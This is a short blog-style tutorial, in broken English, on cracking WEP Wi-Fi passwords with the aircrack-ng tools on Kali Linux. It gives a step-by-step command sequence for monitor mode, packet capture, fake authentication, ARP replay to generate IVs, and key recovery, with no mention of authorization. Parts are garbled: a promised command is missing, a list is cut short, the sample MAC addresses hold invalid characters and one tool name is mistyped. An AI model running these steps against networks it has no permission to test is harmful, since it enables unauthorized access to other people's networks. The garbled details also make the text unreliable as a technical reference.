Wep Wifi Password Cracking / Wireless Hacking
I’ll explain the about how WEP (Wired Equivalent Privacy) protocol for wireless security and tell to make bypass this protocol on this blog.
Firstly, We’ll look at the working princible of WEP Algorithm.If a client wants to connect to the wireless network encrypted with WEP algorithm, in order of;
To connecting encrypted wireless with WEP; (Total 4 step)
1 – The client send to connect request to Acces Point.
2- AP (Access Point) generate a random plain text and send to client to this.
3- Client encrypt the received plain text from AP with own WEP key . (Wep Key is secret key) And it send to AP this encrypted text.
4-AP decrypt the received encrypted text from client with WEP key. if The received text is true, it send accept message to client.
There are three important purposes of WEP Algorithm:
- Identification Verify
- Message Modification Control
How to capture the password of the encrypted wireless network with WEP
Before the start; We using this command for can learn the mac address of my device:
BSSID : Destination Mac Address
ESSID : Name of destination wireless network
Channel : Broadcast Channel Number.
Now, we’ll use wifi hacking tools family of aircrack in the kali linux for cracking the password. Also we’ll use Asus USB-N14 300 Mbps Adapter as hardware.
We’ll use this command for change to monitor mode:
>> airmon-ng start wlan0 or iwconfig wlan0 mode monitor
!After this step, Wlan0 will modify as wlan0mon !
To gather information by sniff the environment:
>> airodump-ng wlan0mon
This command will show us BSSID, ESSID and channel info.
>> airodump-ng wlan0mon -c 10 –bssid 4C:HF:78:TY:8T:4E -w wifi_hack
# This command provide save the gathered packets to current directory. (-w parameter)
Now we’ll create the fake authentication to more speedy gathering the packets.
To do this;
>> aireplay -ng -1 1 -a 4C:HF:78:TY:8T:4E -h D8:8L:0T:E9:12:7A
we created fake authentication with “-1” parameter and specified how many seconds to send with “1” argument.
We specified BSSID (Destination Mac Address) with “-a” parameter and entries mac address of our device with “-h” parameter.
>> aireplay-ng -3 -b 4C:HF:78:TY:8T:4E -h D8:8L:0T:E9:12:7A wlan0mon
With this command,
This command continuously gathering the arp packets and then generate the IV packets ( Initialization Vector). And it repeats the continuously.
>> aircrack-ng wifi_hack.cap
We can crack to password with this command when enough packets are gathered.
“Thanks for reading.”
That’s all for now.